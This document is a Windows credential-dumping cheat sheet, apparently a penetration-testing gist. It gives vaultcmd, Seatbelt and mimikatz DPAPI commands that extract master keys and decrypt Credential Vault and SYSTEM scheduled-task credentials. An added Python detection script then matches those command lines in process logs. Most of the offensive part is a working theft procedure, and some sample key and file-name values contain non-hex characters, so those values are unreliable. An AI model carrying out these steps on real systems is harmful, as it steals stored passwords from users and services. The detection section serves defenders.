Dump Credentials From Windows Credential Vault and Scheduled Tasks

Credential vault

This works only when running as the same user whose credentials are being dumped.

List vaults

C:\Users\Alex\Desktop> vaultcmd /list

List available credentials in vault

C:\Users\Alex\Desktop> vaultcmd /listcreds:"<vault-name>" /all

List where the actual encrypted credentials are stored (note the FileName and the GUID of the master key)

The credentials are usually stored in C:\Users\<username>\AppData\Local\Microsoft\Credentials\. We also need the GUID of the master key used to encrypt these credentials, and Seatbelt can be used to get it.

C:\Users\Alex\Desktop> C:\Tools\Seatbelt\Seatbelt\bin\Release\Seatbelt.exe WindowsCredentialFiles

Find the master key used to encrypt the credential files

Find the master key using the GUID extracted by the command above. The GUID appears between {}. Then extract the master key.

C:\Users\Alex\Desktop> mimikatz !sekurlsa::dpapi

Decrypt the credential using the masterkey

C:\Users\Alex\Desktop> mimikatz dpapi::cred /in:C:\Users\<username>\AppData\Local\Microsoft\Credentials\8C33AC82H3F5DCEAB186B3B2E5B1AC7F /masterkey:9e26495a4bd40a61d5eb6e528d55ef598a398d530ecc2f5387e07605eefc6e3b4ab440d85fc8c4368e0a7ee130761dc407a2c4d58fcd3bd3881fa4371f19cd15

Scheduled Tasks

List scheduled task credentials

C:\Users\Alex\Desktop> ls C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\

For each credential, get the GUID of the master key

C:\Users\Alex\Desktop> mimikatz dpapi::cred /in:C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\E424EEB30498B77B4A85ECBBBCA19B65

Extract the master key

C:\Users\Alex\Desktop> mimikatz !sekurlsa::dpapi

Decrypt the credential file using the master key

C:\Users\Alex\Desktop> mimikatz dpapi::cred /in:C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\E424EEB30498B77B4A85ECBBBCA19B65 /masterkey:32530ddd04093232f87ds5345b3bb4b758b7382ed6db73806f86238f6c3527d830f67210139579f26b0c0f039cd9a53b16b4af0a3f411edfagc593a541f8d0e2
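
On the detection side, the command lines shown above can be matched in process-creation telemetry. The following is an added example, not part of the original gist: it assumes command lines are logged and exported as records with `host`, `user` and `command_line` fields, and the rule names, field names and sample events are all constructed for illustration.

```python
import re
from collections import defaultdict

# Patterns derived from the commands shown on this page (case-insensitive).
RULES = {
    "vault_enum": re.compile(r"vaultcmd(\.exe)?\s+/list", re.I),
    "seatbelt_credfiles": re.compile(r"seatbelt(\.exe)?\s.*WindowsCredentialFiles", re.I),
    "dpapi_masterkey": re.compile(r"sekurlsa::dpapi", re.I),
    "dpapi_cred": re.compile(r"dpapi::cred", re.I),
    "system_cred_path": re.compile(
        r"\\config\\systemprofile\\AppData\\Local\\Microsoft\\Credentials", re.I),
}
DISCOVERY = {"vault_enum", "seatbelt_credfiles", "system_cred_path"}
DECRYPTION = {"dpapi_masterkey", "dpapi_cred"}

def match_rules(command_line):
    """Return the sorted names of every rule the command line triggers."""
    return sorted(name for name, rx in RULES.items() if rx.search(command_line))

def triage(events):
    """Group hits per (host, user); 'high' when discovery and decryption both occur."""
    hits = defaultdict(set)
    for ev in events:
        hits[(ev["host"], ev["user"])].update(match_rules(ev["command_line"]))
    alerts = {}
    for key, names in hits.items():
        if not names:
            continue
        chained = names & DISCOVERY and names & DECRYPTION
        alerts[key] = {"rules": sorted(names), "severity": "high" if chained else "medium"}
    return alerts

# Constructed sample events (hosts, users and the <file> placeholder are made up).
SAMPLE_EVENTS = [
    {"host": "WS01", "user": "alex", "command_line": "vaultcmd /list"},
    {"host": "WS01", "user": "alex", "command_line": 'vaultcmd /listcreds:"Windows Credentials" /all'},
    {"host": "WS01", "user": "alex", "command_line": "Seatbelt.exe WindowsCredentialFiles"},
    {"host": "WS01", "user": "alex", "command_line": r"mimikatz.exe dpapi::cred /in:C:\Users\alex\AppData\Local\Microsoft\Credentials\<file>"},
    {"host": "WS02", "user": "svc_backup", "command_line": "vaultcmd.exe /list"},
    {"host": "WS03", "user": "bob", "command_line": "schtasks /query /fo LIST"},
]

if __name__ == "__main__":
    for (host, user), alert in triage(SAMPLE_EVENTS).items():
        print(host, user, alert["severity"], alert["rules"])
```

Matching of this kind only sees invocations whose command line is logged unmodified, so it works best alongside file-access auditing on the Credentials directories named above.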